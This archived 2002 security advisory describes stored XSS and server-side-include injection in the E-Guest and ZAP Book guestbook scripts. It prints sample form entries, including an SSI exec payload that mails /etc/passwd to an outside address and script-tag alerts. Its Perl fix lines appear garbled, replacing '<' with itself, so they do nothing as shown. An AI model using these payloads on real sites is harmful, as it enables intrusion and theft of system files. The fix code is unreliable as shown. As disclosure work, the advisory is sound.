TUCoPS :: Web :: Guestbooks :: web5497.htm

guestbook cgi - E-Guest & ZAP Book XSS and remote shell execution
1st Jul 2002 [SBWID-5497]
COMMAND

	E-Guest & ZAP Book XSS and remote shell execution

SYSTEMS AFFECTED

	 E-Guest 1.1

	 ZAP Book v1.0.3

PROBLEM

	In DownBload Security Research Lab advisory :
	

	It looks that it is very hard to find secure guestbook. ;).
	

	E-Guest author wrote - \"HTML tag filtering\". That is  true,  but  only
	\'comment\' is filtered, and there is still name,  email,  homepage  and
	location, where we can put our nasty SSI or CSS code.
	

	ZAP Book  is  different  animal.  In  ZAP  Book,  almost  everything  is
	filtered. Exception is \'post\' variable, which contains  user  comment,
	so again, we can put our nasty SSI or CSS code in \'post\' variable.
	

	

	  ======[ Examples

	

	 ---[ E-Guest

	

	 SSI attack

	 ~~~~~~~~~~

	

	Full Name: HI<!--#exec cmd=\"/bin/mail downbload@hotmail.com < /etc/passwd\"-

	->

	E-mail: downbload@hotmail.com

	Homepage:

	UIN:

	Location: Beyond the light

	Comment: Nothing special, just SSI attack.

	

	 CSS attack

	 ~~~~~~~~~~

	

	Full Name: HI<script>javascript:alert(\'HACKED BY DOWNBLOAD\');</script>

	E-mail: downbload@hotmail.com

	Homepage:

	UIN:

	Location: Beyond the light

	Comment: Nothing special, just CSS attack.

	

	

	  ---[ ZAP Book

	

	 SSI attack

	 ~~~~~~~~~~

	

	Name: DownBload

	Email: downbload@hotmail.com

	Homepage:

	Location:

	AIM Screename:

	MSN Email:

	Yahoo! Screename:

	ICQ Number:

	Referred by: Search Engine

	Entry: SSI attack <!--#exec cmd=\"/bin/mail downbload@hotmail.com 

	< /etc/passwd\"-->

	

	 CSS attack

	 ~~~~~~~~~~

	

	Name: DownBload

	Email: downbload@hotmail.com

	Homepage:

	Location:

	AIM Screename:

	MSN Email:

	Yahoo! Screename:

	ICQ Number:

	Referred by: Search Engine

	Entry: CSS attack <script>javascript:alert(\'HACKED BY DOWNBLOAD\');</script>

	

SOLUTION

	

	---[ E-Guest

	

	FIX: Add next code to E-Guest_sign.pl (or wait for fixed version :-):
	

	...

	$fullname =~ s/</</g;

	$fullname =~ s/>/>/g;

	

	$email =~ s/</</g;

	$email =~ s/>/>/g;

	

	$homepage =~ s/</</g;

	$homepage =~ s/>/>/g;

	

	$uin =~ s/</</g;

	$uin =~ s/>/>/g;

	

	$location =~ s/</</g;

	$location =~ s/>/>/g;

	...

	

	

	

	---[ ZAP Book

	

	FIX: Add next code to addentry.cgi (or wait for fixed version :-):
	

	...

	$in{\'post\'} =~ s/</</g;

	$in{\'post\'} =~ s/>/>/g;

	...

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH